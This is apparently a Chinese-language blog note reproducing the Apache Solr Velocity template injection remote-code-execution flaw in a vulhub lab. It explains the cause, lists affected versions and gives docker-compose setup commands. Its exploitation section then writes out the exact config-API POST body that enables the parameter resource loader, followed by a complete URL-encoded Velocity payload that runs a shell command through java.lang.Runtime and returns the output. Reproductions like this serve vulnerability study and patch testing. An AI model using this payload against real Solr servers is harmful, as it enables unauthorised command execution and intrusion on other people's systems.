Apache Solr Velocity模板注入RCE漏洞復現

• 2019 年 11 月 4 日
• 筆記

0x00 簡介

Solr是一個獨立的企業級搜索應用伺服器，它對外提供類似於Web-service的API介面。用戶可以通過http請求，向搜索引擎伺服器提交一定格式的XML文件，生成索引；也可以通過Http Get操作提出查找請求，並得到XML格式的返回結果。

0x01 漏洞概述

該漏洞的產生是由於兩方面的原因：

當攻擊者可以直接訪問Solr控制台時，可以通過發送類似/節點名/config的POST請求對該節點的配置文件做更改。

Apache Solr默認集成VelocityResponseWriter插件，在該插件的初始化參數中的params.resource.loader.enabled這個選項是用來控制是否允許參數資源載入器在Solr請求參數中指定模版，默認設置是false。 當設置params.resource.loader.enabled為true時，將允許用戶通過設置請求中的參數來指定相關資源的載入，這也就意味著攻擊者可以通過構造一個具有威脅的攻擊請求，在伺服器上進行命令執行。（來自360CERT）

0x02 影響範圍

Apache Solr 5.x – 8.2.0，存在config API版本

0x03 環境搭建

自行搭建：

使用vulhub中CVE-2019-0193的環境進行搭建

啟動vulhub環境：

git clone https://github.com/vulhub/vulhub.gitcd vulhub/solr/CVE-2019-0193docker-compose up -d

創建名為test的Core：

docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db

搭建好後默認埠為8983，訪問http://ip:8983 即可

0x04 漏洞利用

利用前提：攻擊者需要知道Solr服務中Core的名稱才能執行攻擊

如上圖所示的這個名稱就是Core的名稱

直接構造POST請求，在/solr/test/config目錄POST以下數據（修改Core的配置）

{  "update-queryresponsewriter": {    "startup": "lazy",    "name": "velocity",    "class": "solr.VelocityResponseWriter",    "template.base.dir": "",    "solr.resource.loader.enabled": "true",    "params.resource.loader.enabled": "true"  }}

然後使用公開的exp發送請求

http://ip:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

即可成功執行命令